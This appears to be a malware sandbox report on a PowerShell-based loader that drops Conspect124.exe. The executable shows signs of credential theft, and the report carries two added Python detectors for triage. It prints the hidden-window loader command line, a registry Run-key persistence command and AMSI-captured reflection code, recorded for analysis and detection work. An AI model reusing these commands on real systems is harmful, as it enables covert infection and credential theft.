Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Process created: C:\Users\user\AppData\Local\Temp\Conspect124.exe C:\Users\user\AppData\Local\Temp\Conspect124.exe /stext "C:\Users\user\AppData\Local\Temp\vnfxngzclhxvohwunodvwkzvgosxx"
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Process created: C:\Users\user\AppData\Local\Temp\Conspect124.exe C:\Users\user\AppData\Local\Temp\Conspect124.exe /stext "C:\Users\user\AppData\Local\Temp\fhlpgzkezppayvsywzqpzpmegvkgywqb"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Begunstigelses% -windowstyle minimized $Hjtryksryg=(Get-ItemProperty -Path 'HKCU:\Forseglingens\').Drenching;%Begunstigelses% ($Hjtryksryg)"
Source: C:\Users\user\Desktop\SDWLLRJcsY.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\SDWLLRJcsY.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\SDWLLRJcsY.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\SDWLLRJcsY.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\SDWLLRJcsY.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\SDWLLRJcsY.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\SDWLLRJcsY.exe | Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\SDWLLRJcsY.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\SDWLLRJcsY.exe | Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\SDWLLRJcsY.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\SDWLLRJcsY.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\SDWLLRJcsY.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\SDWLLRJcsY.exe | Section loaded: riched20.dll
Source: C:\Users\user\Desktop\SDWLLRJcsY.exe | Section loaded: usp10.dll
Source: C:\Users\user\Desktop\SDWLLRJcsY.exe | Section loaded: msls31.dll
Source: C:\Users\user\Desktop\SDWLLRJcsY.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\SDWLLRJcsY.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\SDWLLRJcsY.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\SDWLLRJcsY.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\SDWLLRJcsY.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\SDWLLRJcsY.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\SDWLLRJcsY.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\SDWLLRJcsY.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\SDWLLRJcsY.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Section loaded: bcp47langs.dll
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: rstrtmgr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: pstorec.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: pstorec.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: brandbombernes.lnk.0.drLNK file: ..\Users\user\AppData\Local\Temp\nsy4F91.tmp\cueca.Stu
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
            Source: SDWLLRJcsY.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbr source: powershell.exe, 00000001.00000002.3164322677.0000000002889000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ore.pdbK source: powershell.exe, 00000001.00000002.3172185585.00000000072D0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: bqm.Core.pdb source: powershell.exe, 00000001.00000002.3172185585.00000000072D0000.00000004.00000020.00020000.00000000.sdmp
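The "Section loaded" rows above are raw module-load events. What a triage analyst wants from them is the capability they imply per process: Conspect124.exe pulling in vaultcli.dll, pstorec.dll and dpapi.dll right before the Outlook account key is opened is a credential-theft lead, and schannel.dll plus winhttp.dll/wininet.dll means a TLS client. The following is an added example written by the editor; it is not part of the Joe Sandbox report and not GuLoader or Remcos code. It parses rows in the "Source: <process> | Section loaded: <dll>" form used on this page (the fused form without the separator is accepted too) into per-process module sets and matches them against small indicator sets. The indicator sets are the editor's heuristic, and the sample input is a constructed subset of the rows above plus one unrelated row.

```python
"""Capability triage over the 'Section loaded' rows of a sandbox report.

Added example by the editor; not part of the Joe Sandbox report and not
GuLoader or Remcos code. Which DLLs hint at which capability is the
editor's heuristic; a match is a lead for the analyst, not a verdict.
"""
import re
from collections import defaultdict

ROW_RE = re.compile(
    r"^Source:\s*(?P<proc>.+?)\s*\|?\s*Section loaded:\s*(?P<dll>[\w.\-]+?\.dll)",
    re.IGNORECASE,
)

# Heuristic (assumption): a process that loads every DLL of a set likely uses that capability.
INDICATORS = {
    "credential store access": {"vaultcli.dll", "pstorec.dll", "dpapi.dll"},
    "tls network client": {"schannel.dll", "winhttp.dll", "wininet.dll"},
    "file lock release (browser db theft)": {"rstrtmgr.dll"},
    "wmi / com": {"wbemcomn.dll"},
    "name resolution": {"dnsapi.dll", "mswsock.dll"},
}

def parse_rows(text):
    """Return {process: set(dll)}; rows that are not 'Section loaded' are ignored."""
    loaded = defaultdict(set)
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            loaded[m.group("proc").strip()].add(m.group("dll").lower())
    return dict(loaded)

def capabilities(loaded, min_fraction=1.0):
    """Return {process: sorted capability names}.

    An indicator fires when at least min_fraction of its DLLs were loaded by
    the process (1.0 = all of them, which keeps false positives low).
    """
    result = {}
    for proc, dlls in loaded.items():
        fired = [name for name, needed in INDICATORS.items()
                 if len(needed & dlls) / len(needed) >= min_fraction]
        result[proc] = sorted(fired)
    return result

# Constructed input: a subset of this report's rows plus one unrelated row.
SAMPLE_ROWS = r"""
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Section loaded: pstorec.dll
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
"""

if __name__ == "__main__":
    for proc, caps in capabilities(parse_rows(SAMPLE_ROWS)).items():
        print(proc, "->", ", ".join(caps) or "no indicator")
```

Lowering min_fraction trades precision for recall: with 1.0 a process must load the whole set, which is the right default when the input is a complete module list from a sandbox run; a partial match is more useful on a truncated log.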

Data Obfuscation

Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Unpacked PE file: 11.2.Conspect124.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Unpacked PE file: 12.2.Conspect124.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Unpacked PE file: 13.2.Conspect124.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: Yara match | File source: 00000001.00000002.3181422671.000000000B5DE000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Kolorittens $Masculate $Unfavourably), (Databasesprogenes @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Choktilstanden = [AppDomain]::CurrentDomain.GetAs
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Spectrograph)), $Optikkens).DefineDynamicModule($Polycladida, $false).DefineType($munster, $Teethbrush, [System.MulticastDelegate])$Ir
Source: C:\Users\user\Desktop\SDWLLRJcsY.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Headcloths=Get-Content 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Papyr.paa';$Antinovels=$Headcloths.SubString(57477,3);.$Antinovels($Headcloths)"
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 11_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_02DA0AC5 push ebx; iretd 1_2_02DA0AFA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_02DA0AFB push ebx; iretd 1_2_02DA0AFA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_02DA0B2D push ebx; iretd 1_2_02DA0AFA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_02DA0F43 pushad ; iretd 1_2_02DA0F42
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_02DA0F37 pushad ; iretd 1_2_02DA0F42
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_02DA12D0 push esp; iretd 1_2_02DA12D9
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 7_2_23BD1219 push esp; iretd 7_2_23BD121A
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 7_2_23BC2806 push ecx; ret 7_2_23BC2819
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 11_2_0044693D push ecx; ret 11_2_0044694D
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 11_2_0044DB70 push eax; ret 11_2_0044DB84
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 11_2_0044DB70 push eax; ret 11_2_0044DBAC
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 11_2_00451D54 push eax; ret 11_2_00451D61
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 12_2_0044B090 push eax; ret 12_2_0044B0A4
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 12_2_0044B090 push eax; ret 12_2_0044B0CC
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 12_2_00444E71 push ecx; ret 12_2_00444E81
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 13_2_00414060 push eax; ret 13_2_00414074
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 13_2_00414060 push eax; ret 13_2_0041409C
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 13_2_00414039 push ecx; ret 13_2_00414049
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 13_2_004164EB push 0000006Ah; retf 13_2_004165C4
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 13_2_00416553 push 0000006Ah; retf 13_2_004165C4
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 13_2_00416555 push 0000006Ah; retf 13_2_004165C4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\Conspect124.exe
Source: C:\Windows\SysWOW64\reg.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup key (2 events)
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 12_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\SDWLLRJcsY.exe | Process information set: NOOPENFILEERRORBOX (3 events)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (73 events)
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Process information set: NOOPENFILEERRORBOX (10 events)
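The PowerShell command line recorded in this section is the loader stage: it reads a payload file with a non-script extension, takes a three-character substring of that content at a fixed offset as a command name, and invokes it on the whole content with the dot operator. The two AMSI rows show the next stage, building a delegate type with DefineDynamicAssembly/DefineDynamicModule/DefineType over MulticastDelegate so that GetDelegateForFunctionPointer can turn a raw address into something callable. The following is an added example by the editor, not part of the Joe Sandbox report and not GuLoader or Remcos code, that scores a command line or an AMSI-captured fragment on exactly those traits. The weights, the threshold, the script-extension list and the benign sample line are the editor's assumptions; the other two samples are copied from the rows above. The payload file was not captured in the report, so the detector does not try to resolve what the three characters are.

```python
"""Detector for the self-decoding PowerShell loader pattern in this report.

Added example by the editor; not part of the Joe Sandbox report and not
GuLoader or Remcos code. Scores one command line or script fragment on:
  1. a hidden window,
  2. Get-Content of a payload whose extension is not a script extension,
  3. a command name taken from a short SubString of that content,
  4. invoking a variable as a command ('.$name(' or '&$name('),
  5. reflection APIs that turn a raw function pointer into a delegate.
Weights, threshold and the extension list are the editor's assumptions.
"""
import re

GET_CONTENT_RE = re.compile(
    r"""Get-Content\s+(?:'(?P<sq>[^']+)'|"(?P<dq>[^"]+)"|(?P<bare>[^\s;|]+))""", re.I)
SUBSTRING_RE = re.compile(r"\.SubString\(\s*(?P<off>\d+)\s*,\s*(?P<len>\d+)\s*\)", re.I)
INVOKE_VAR_RE = re.compile(r"[.&]\s*\$\w+\s*\(")      # .$name( or &$name(
HIDDEN_RE = re.compile(r"-w\w*\s+hidden", re.I)       # -windowstyle hidden and abbreviations
SCRIPT_EXT = {".ps1", ".psm1", ".psd1", ".txt"}
REFLECTION_APIS = ("GetDelegateForFunctionPointer", "DefineDynamicAssembly",
                   "DefineDynamicModule", "DefineType", "MulticastDelegate")

def analyze_powershell(text):
    """Return a dict of findings, a numeric score and a 'suspicious' verdict."""
    m = GET_CONTENT_RE.search(text)
    path = next((g for g in m.groups() if g), None) if m else None
    base = path.rsplit("\\", 1)[-1] if path else ""
    ext = "." + base.rsplit(".", 1)[-1].lower() if "." in base else ""
    sub = SUBSTRING_RE.search(text)
    apis = [a for a in REFLECTION_APIS if a in text]
    f = {
        "hidden_window": bool(HIDDEN_RE.search(text)),
        "payload_path": path,
        "payload_non_script_ext": path is not None and ext not in SCRIPT_EXT,
        "substring": (int(sub["off"]), int(sub["len"])) if sub else None,
        "short_command_from_content": bool(sub) and int(sub["len"]) <= 4,
        "invokes_variable": bool(INVOKE_VAR_RE.search(text)),
        "reflection_apis": apis,
    }
    loader_traits = ("hidden_window", "payload_non_script_ext",
                     "short_command_from_content", "invokes_variable")
    f["score"] = sum(int(f[k]) for k in loader_traits) + int(bool(apis)) + int(len(apis) >= 3)
    # Either three loader traits together, or the delegate-building chain on its own.
    f["suspicious"] = f["score"] >= 3 or len(apis) >= 3
    return f

SAMPLES = {
    # Copied from the report: the observed loader command line.
    "observed": r'''"powershell.exe" -windowstyle hidden "$Headcloths=Get-Content 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Papyr.paa';$Antinovels=$Headcloths.SubString(57477,3);.$Antinovels($Headcloths)"''',
    # Copied from the report: an AMSI-captured fragment, truncated by the sandbox.
    "amsi": r"DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Spectrograph)), $Optikkens).DefineDynamicModule($Polycladida, $false).DefineType($munster, $Teethbrush, [System.MulticastDelegate])$Ir",
    # Constructed benign line for contrast.
    "benign": r'''"powershell.exe" -Command "Get-Content 'C:\logs\app.log' | Select-String ERROR"''',
}

if __name__ == "__main__":
    for name, line in SAMPLES.items():
        f = analyze_powershell(line)
        print(f"{name:9} score={f['score']} suspicious={f['suspicious']} "
              f"substring={f['substring']} reflection={f['reflection_apis']}")
```

The benign line scores one point (Get-Content of a .log file) and stays below the threshold; the observed line collects all four loader traits; the AMSI fragment has no loader traits at all and is flagged only because four of the delegate-building APIs appear together, which is why that rule is separate from the score.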

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | API/Special instruction interceptor: Address: 4567AE3
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6487
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3117
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Window / User API: threadDelayed 1594
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Window / User API: threadDelayed 8392
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | API coverage: 4.3 %
